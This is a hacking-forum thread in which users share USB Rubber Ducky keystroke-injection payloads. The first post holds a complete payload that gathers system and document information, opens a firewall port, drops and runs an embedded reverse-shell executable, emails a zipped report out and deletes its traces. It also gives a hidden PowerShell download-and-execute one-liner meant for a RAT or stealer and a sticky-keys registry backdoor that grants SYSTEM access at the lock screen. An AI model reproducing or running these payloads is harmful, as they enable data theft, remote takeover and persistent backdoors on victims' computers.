Author Topic: Rubber Ducky Payloads (Read 4246 times)

iTpHo3NiX · « **on:** June 30, 2014, 01:49:49 am »

Here is the place to post either your favorite payloads or your own custom payloads. Please be sure to post what your payload does and if any changes need to be made.

This is a generated payload that will grab computer information, and users documents. It also opens up port 1337 TCP (can be changed to any port) as well as runs netcat backdoor that listens on 127.0.0.1 port 31337 (this option would need to be changed to your listener machine) and emails the report to penis@gmail.com which needs to be changed (along with the user and password)

Code: [Select]

DELAY 1200
GUI r
DELAY 1200
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 1200
ALT y
DELAY 1200
ENTER
ALT SPACE
DELAY 1200
STRING m
DELAY 1200
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item  ($userDir) -ItemType Directory
ENTER
STRING $date = get-date
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
ENTER
STRING $Report = $Report +"<div id=body><h1>Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
ENTER 
STRING $SysBootTime = Get-WmiObject Win32_OperatingSystem 
ENTER 
STRING $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime 
ENTER 
STRING $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME) 
ENTER 
STRING $SerialNo = $SysSerialNo.SerialNumber 
ENTER 
STRING $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model 
ENTER 
STRING $SysManufacturer = $SysInfo.Manufacturer 
ENTER 
STRING $SysModel = $SysInfo.Model
ENTER 
STRING $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption
ENTER 
STRING $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'"
ENTER
STRING $HD = [math]::truncate($disk.Size / 1GB)
ENTER
STRING $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB)
ENTER
STRING $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select  TotalVisibleMemorySize
ENTER 
STRING $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB)
ENTER 
STRING $SysCpu = Get-WmiObject Win32_Processor | Select Name
ENTER 
STRING $Cpu = $SysCpu.Name
ENTER 
STRING $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber
ENTER 
STRING $HardSerialNo = $HardSerial.SerialNumber
ENTER 
STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name
ENTER 
STRING $graphicsCard = gwmi win32_VideoController |select Name
ENTER
STRING $graphics = $graphicsCard.Name
ENTER
STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1
ENTER
STRING $DriveLetter = $CDDrive.Drive
ENTER
STRING $DriveName = $CDDrive.Caption
ENTER
STRING $Disk = $DriveLetter + '' + $DriveName
ENTER
STRING $Firewall = New-Object -com HNetCfg.FwMgr 
ENTER 
STRING $FireProfile = $Firewall.LocalPolicy.CurrentProfile 
ENTER 
STRING $FireProfile = $FireProfile.FirewallEnabled
ENTER 
STRING $Report = $Report  + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>"
ENTER 
STRING $Report =  $Report + '<div id=center><h3>User Documents (doc,docx,pdf,rar)</h3>'
ENTER 
STRING $Report =  $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar, *.xls, *.xlsx, *.txt -Recurse |convertto-html Directory, Name, LastAccessTime)
ENTER 
STRING $Report = $Report + '</div>'
ENTER
STRING netsh advfirewall firewall add rule name='WindowsPortOpen' dir=in action=allow protocol=TCP localport=1337
ENTER
DELAY 500
STRING $decoder = 'Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0):outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = CreateObject("Scripting.FileSystemObject"):set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function decodeBase64(base64):dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub writeBytes(file, bytes):Dim binaryStream:Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub'
ENTER
STRING $reverse = 'TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAAAADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAAAAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0AAHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hAWXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAAMAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNqkQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwFEVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtvKhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLpAOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNmMgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/AVXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7shwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzpbMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOYLmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B/7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBkSNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2Vsm0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAAAAxAAADpdL7//wAAAAIAAAAMQAAA'
ENTER
STRING Set-Content -Value $decoder -Path C:\decoder.vbs
ENTER
STRING Set-Content -Value $reverse -Path C:\reverse.txt
ENTER
STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe
ENTER
STRING c:\reverse.exe 127.0.0.1 31337
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
ENTER
STRING function copy-ToZip($fileSaveDir){
ENTER
STRING $srcdir = $fileSaveDir
ENTER
STRING $zipFile = 'C:\Windows\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) {
ENTER
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER
STRING (dir $zipFile).IsReadOnly = $false}
ENTER
STRING $shellApplication = new-object -com shell.application
ENTER
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
ENTER
STRING $files = Get-ChildItem -Path $srcdir
ENTER
STRING foreach($file in $files) {
ENTER
STRING $zipPackage.CopyHere($file.FullName)
ENTER
STRING while($zipPackage.Items().Item($file.name) -eq $null){
ENTER
STRING Start-sleep -seconds 1 }}}
ENTER
STRING copy-ToZip($fileSaveDir)
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('null', 'null');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'null'
ENTER
STRING $ReportEmail.To.Add('null')
ENTER
STRING $ReportEmail.Subject = 'Recon Report'
ENTER
STRING $ReportEmail.Body = 'Please find attached your reconnaissance report.' 
ENTER
STRING $ReportEmail.Attachments.Add('C:\Windows\Report.zip')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
STRING remove-item $fileSaveDir -recurse
ENTER
STRING remove-item 'C:\Windows\Report.zip'
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL S
DELAY  1200
STRING C:\Windows\config-13516.ps1
ENTER
DELAY 1200
ALT F4
DELAY 1200
GUI r
DELAY 1200
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 1200
ALT y
DELAY 1200
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 1200
STRING m
DELAY 1200
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 1200
STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1
ENTER

Download and execute file, need to change downloaded file to your RAT, botnet, stealer, etc.:

Code: [Select]

GUI r
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
ENTER

Ability to attack from the lock screen as system. Please note that this is a setup for later exploitation when the computer is locked.

Code: [Select]

DELAY 400
ESCAPE
DELAY 200
CONTROL ESCAPE
DELAY 750
STRING cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f"
DELAY 750
CTRL-SHIFT ENTER
DELAY 1000
ALT y

After that has been executed on the system, when at the lock screen you have your payloads enter: Left Alt + Left Shift + Print Screen
You'll now have a SYSTEM user level command prompt which can run powershell, create vbs/batch scripts, auto starts whatever.

iTpHo3NiX · « **Reply #1 on:** June 30, 2014, 03:38:28 am »

Quote from: noncetonic on June 30, 2014, 03:13:56 am

The Rubberducky github has a boatload of payloads :

Code: [Select]
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
The Duck Toolkit is also nice
Code: [Select]
http://www.ducktoolkit.com/Home.jsp

Yup that's were I got these. The first one is generated from duck toolkit with a few modifications, other ones were listed on the payload wiki. When I actually get the device I will be working on my own payload. UAC bypass with WIN+R is great. Also like that run payload from being locked, can also be done with the sticky keys trick. Hopefully I'll be able to order it soon

Kulverstukas · « **Reply #2 on:** June 30, 2014, 07:41:17 am »

Rubber ducky is mad expensive. I have bought teensy which does pretty much the same, noncetonic said that originally Ducky was build from Teensy.
However I tried to flash ducky firmware onto my teensy and was unable to... something didn't match :/

I have wrote some stuff myself as a payload launcher: https://evilzone.org/c-c/%28arduino%29-payload-launcher-for-teensy/
DeXTreme had his own project about it: https://evilzone.org/projects-and-discussion/project-shebang/
And frog initiated his project: https://evilzone.org/projects-and-discussion/teensy-dropper-project-details-and-progress/

EvilZone

News:

Author Topic: Rubber Ducky Payloads (Read 4246 times)

iTpHo3NiX

Rubber Ducky Payloads

iTpHo3NiX

Re: Rubber Ducky Payloads

Kulverstukas

Re: Rubber Ducky Payloads